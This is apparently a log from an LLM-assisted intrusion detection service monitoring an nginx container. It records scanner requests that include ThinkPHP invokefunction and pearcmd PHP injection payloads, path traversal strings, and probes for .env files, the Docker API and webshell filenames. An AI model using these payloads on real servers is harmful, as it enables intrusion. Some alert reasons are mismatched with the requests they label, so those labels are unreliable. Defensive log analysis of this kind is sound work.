Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.418040 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:25.045126745Z 101.36.107.228 - - [20/Mar/2026:13:45:25 +0000] "54.200.221.0" "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&...
Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.956039 [observer] Pipeline: processed=5828 pattern_hits=5527 llm_calls=301 llm_errors=3 learned=4
Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.956071 [observer] Patterns: hash=5527 prefix=0 regex=0 contains=0 deny=64 alert=434 suppress=0 misses=301
Mar 20 13:49:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:07.446370 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.78 action=deny pattern_type=
Mar 20 13:49:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:07.446408 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted local file access and PHP code injection via crafted request to index.php with path traversal parameters Line=2026-03-20T13:45:25.553743509Z 2026/03/20 13:45:25 [error] 422#422: *750652 open() "/usr/share/nginx/default/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: _, reques...
Mar 20 13:49:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:07.446466 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:25.553788272Z 101.36.107.228 - - [20/Mar/2026:13:45:25 +0000] "54.200.221.0" "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi...
Mar 20 13:49:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:11.169058 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.85 action=deny pattern_type=
Mar 20 13:49:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:11.169101 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Detected a likely path traversal attempt in the request parameter (../../../../../../../../tmp/index1) targeting index.php, which is a common attacker technique to access restricted files. Line=2026-03-20T13:45:25.962627833Z 2026/03/20 13:45:25 [error] 422#422: *750652 open() "/usr/share/nginx/default/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: _, reques...
Mar 20 13:49:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:11.169151 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:25.962747842Z 101.36.107.228 - - [20/Mar/2026:13:45:25 +0000] "54.200.221.0" "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:49:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:16.350292 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 13:49:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:16.350332 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=External client attempted to access /containers/json on nginx, which is a common Docker API probe indicating potential Docker API exposure or reconnaissance. Line=2026-03-20T13:45:26.472561283Z 2026/03/20 13:45:26 [error] 422#422: *750652 open() "/usr/share/nginx/default/containers/json" failed (2: No such file or directory), client: 101.36.107.228, server: _, ...
Mar 20 13:49:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:16.350403 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:26.472745865Z 101.36.107.228 - - [20/Mar/2026:13:45:26 +0000] "54.200.221.0" "GET /containers/json HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:49:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:16.350925 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T13:47:52.090924903Z 2026/03/20 13:47:52 [error] 422#422: *750684 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 145.223.59.61, server: _, request: "GE...
Mar 20 13:49:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:16.350956 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:47:52.090956214Z 145.223.59.61 - - [20/Mar/2026:13:47:52 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik...
Mar 20 13:49:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:16.350985 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T13:47:52.906123347Z 145.223.59.61 - - [20/Mar/2026:13:47:52 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Ge...
Mar 20 13:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:31.937531 [observer] Pipeline: processed=5861 pattern_hits=5558 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:31.937555 [observer] Patterns: hash=5558 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:50:01.981470 [observer] Pipeline: processed=5863 pattern_hits=5560 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:50:01.981506 [observer] Patterns: hash=5560 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:50:31.935795 [observer] Pipeline: processed=5867 pattern_hits=5564 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:50:31.935822 [observer] Patterns: hash=5564 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:51:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:51:02.011012 [observer] Pipeline: processed=5869 pattern_hits=5566 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:51:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:51:02.011059 [observer] Patterns: hash=5566 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:51:31.952795 [observer] Pipeline: processed=5871 pattern_hits=5568 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:51:31.952839 [observer] Patterns: hash=5568 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:52:01.961826 [observer] Pipeline: processed=5875 pattern_hits=5572 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:52:01.961861 [observer] Patterns: hash=5572 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:52:31.952044 [observer] Pipeline: processed=5879 pattern_hits=5576 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:52:31.952074 [observer] Patterns: hash=5576 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:53:01.941143 [observer] Pipeline: processed=5883 pattern_hits=5580 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:53:01.941187 [observer] Patterns: hash=5580 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:53:31.945785 [observer] Pipeline: processed=5885 pattern_hits=5582 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:53:31.945828 [observer] Patterns: hash=5582 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:54:01.989849 [observer] Pipeline: processed=5889 pattern_hits=5586 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:54:01.989886 [observer] Patterns: hash=5586 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:54:31.945716 [observer] Pipeline: processed=5891 pattern_hits=5588 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:54:31.945744 [observer] Patterns: hash=5588 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:55:01.957741 [observer] Pipeline: processed=5893 pattern_hits=5590 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:55:01.957774 [observer] Patterns: hash=5590 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:55:31.937373 [observer] Pipeline: processed=5897 pattern_hits=5594 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:55:31.937404 [observer] Patterns: hash=5594 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:56:01.990824 [observer] Pipeline: processed=5899 pattern_hits=5596 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:56:01.990861 [observer] Patterns: hash=5596 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:56:31.937656 [observer] Pipeline: processed=5903 pattern_hits=5600 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:56:31.937683 [observer] Patterns: hash=5600 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:57:01.985627 [observer] Pipeline: processed=5905 pattern_hits=5602 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:57:01.985665 [observer] Patterns: hash=5602 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:57:31.935591 [observer] Pipeline: processed=5911 pattern_hits=5608 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:57:31.935615 [observer] Patterns: hash=5608 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:58:01.958781 [observer] Pipeline: processed=5913 pattern_hits=5610 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:58:01.958839 [observer] Patterns: hash=5610 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:58:31.951534 [observer] Pipeline: processed=5915 pattern_hits=5612 llm_calls=303 llm_errors=3 learned=4
Mar 20 13:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:58:31.951559 [observer] Patterns: hash=5612 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=303
Mar 20 13:59:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:00.969844 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:59:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:00.969898 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to a potentially sensitive PHP file (wp_filemanager.php) under a WordPress plugin; such files are common targets for exploitation attempts. Line=2026-03-20T13:58:56.500481086Z 2026/03/20 13:58:56 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), cl...
Mar 20 13:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:01.943826 [observer] Pipeline: processed=5921 pattern_hits=5616 llm_calls=305 llm_errors=3 learned=4
Mar 20 13:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:01.943857 [observer] Patterns: hash=5616 prefix=0 regex=0 contains=0 deny=68 alert=436 suppress=0 misses=305
Mar 20 13:59:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:04.787812 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:59:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:04.787854 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:56.500566909Z 4.204.200.32 - - [20/Mar/2026:13:58:56 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 240...
Mar 20 13:59:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:08.880150 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:59:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:08.880212 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request attempts to access a WordPress file (wp-blogs.php) resulting in a missing file error; could indicate probing for vulnerable paths though not definitive malicious activity. Line=2026-03-20T13:58:56.568270240Z 2026/03/20 13:58:56 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-blogs.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reque...
Mar 20 13:59:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:08.880279 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:56.568447481Z 4.204.200.32 - - [20/Mar/2026:13:58:56 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-blogs.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 13:59:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:15.898875 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:59:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:15.898912 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to /usr/share/nginx/default/tfm.php and open() failure suggests probe for a possible webshell/file of interest; not definitive but worth alerting. Line=2026-03-20T13:58:56.636004119Z 2026/03/20 13:58:56 [error] 422#422: *750796 open() "/usr/share/nginx/default/tfm.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 13:59:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:15.898977 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:56.636095789Z 4.204.200.32 - - [20/Mar/2026:13:58:56 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET //tfm.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 13:59:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:21.464311 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:59:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:21.464353 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request for a PHP file that does not exist may indicate probing or attempted exploitation Line=2026-03-20T13:58:56.703742779Z 2026/03/20 13:58:56 [error] 422#422: *750796 open() "/usr/share/nginx/default/8xyz.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 13:59:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:21.464435 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:56.703880608Z 4.204.200.32 - - [20/Mar/2026:13:58:56 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /8xyz.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 13:59:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:26.770525 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:59:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:26.770559 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An HTTP GET request to a PHP file that likely doesn't exist (RIP.php) appears to be probing for a potential PHP file on the web server. This pattern is commonly associated with automated vulnerability scanning or probing activity. Line=2026-03-20T13:58:56.771434839Z 2026/03/20 13:58:56 [error] 422#422: *750796 open() "/usr/share/nginx/default/RIP.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 13:59:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:26.770623 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:56.771530616Z 4.204.200.32 - - [20/Mar/2026:13:58:56 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /RIP.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 13:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:31.940700 [observer] Pipeline: processed=5930 pattern_hits=5620 llm_calls=310 llm_errors=3 learned=4
Mar 20 13:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:31.940733 [observer] Patterns: hash=5620 prefix=0 regex=0 contains=0 deny=68 alert=440 suppress=0 misses=310
Mar 20 13:59:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:35.602031 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:59:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:35.602072 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx error showing a missing file, with an unusual requested path (/ioxi.php). Could indicate probing or misconfiguration. Line=2026-03-20T13:58:56.839421549Z 2026/03/20 13:58:56 [error] 422#422: *750796 open() "/usr/share/nginx/default/ioxi.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 13:59:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:35.602137 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:56.839497653Z 4.204.200.32 - - [20/Mar/2026:13:58:56 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ioxi.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 13:59:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:43.054692 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 13:59:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:43.054730 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An HTTP GET for a php file (nc4.php) resulting in an open() file-not-found error suggests probing for exposed PHP scripts; could indicate an attempted file access or vulnerability scan. Line=2026-03-20T13:58:56.907530917Z 2026/03/20 13:58:56 [error] 422#422: *750796 open() "/usr/share/nginx/default/nc4.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 13:59:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:43.054793 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:56.907594261Z 4.204.200.32 - - [20/Mar/2026:13:58:56 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /nc4.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 13:59:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:48.493722 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:59:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:48.493758 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a non-existent wp-ssfc.php file via HTTP GET, typical of probing for vulnerable PHP files. Line=2026-03-20T13:58:56.975140253Z 2026/03/20 13:58:56 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-ssfc.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reques...
Mar 20 13:59:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:48.493821 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:56.975342405Z 4.204.200.32 - - [20/Mar/2026:13:58:56 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-ssfc.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 13:59:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:52.859949 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:59:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:52.859988 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx error line indicating a missing file for a request (GET /ws75.php). This could be normal for missing resources but may indicate probing or misconfiguration. Line=2026-03-20T13:58:57.043028775Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws75.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 13:59:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:59:52.860050 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.043045968Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws75.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:00.046590 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:00:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:00.046637 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error indicates a missing file being requested (ws78.php), which can be part of probing or misconfiguration but is not a confirmed attack. Line=2026-03-20T13:58:57.110946758Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws78.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:00:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:00.046740 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.110961518Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws78.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:01.977607 [observer] Pipeline: processed=5940 pattern_hits=5625 llm_calls=315 llm_errors=3 learned=4
Mar 20 14:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:01.977640 [observer] Patterns: hash=5625 prefix=0 regex=0 contains=0 deny=68 alert=445 suppress=0 misses=315
Mar 20 14:00:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:06.369153 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:00:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:06.369218 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to a wordpress-related PHP file that does not exist; could be probing for Wordpress/wpmu scripts or misconfigured files; unusual access pattern and missing file error Line=2026-03-20T13:58:57.178695285Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-png.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request...
Mar 20 14:00:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:06.369294 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.178695234Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-png.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:06.369327 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.264117600Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /000.php HTTP/1.1" 404 2401 "-" "-" "-"
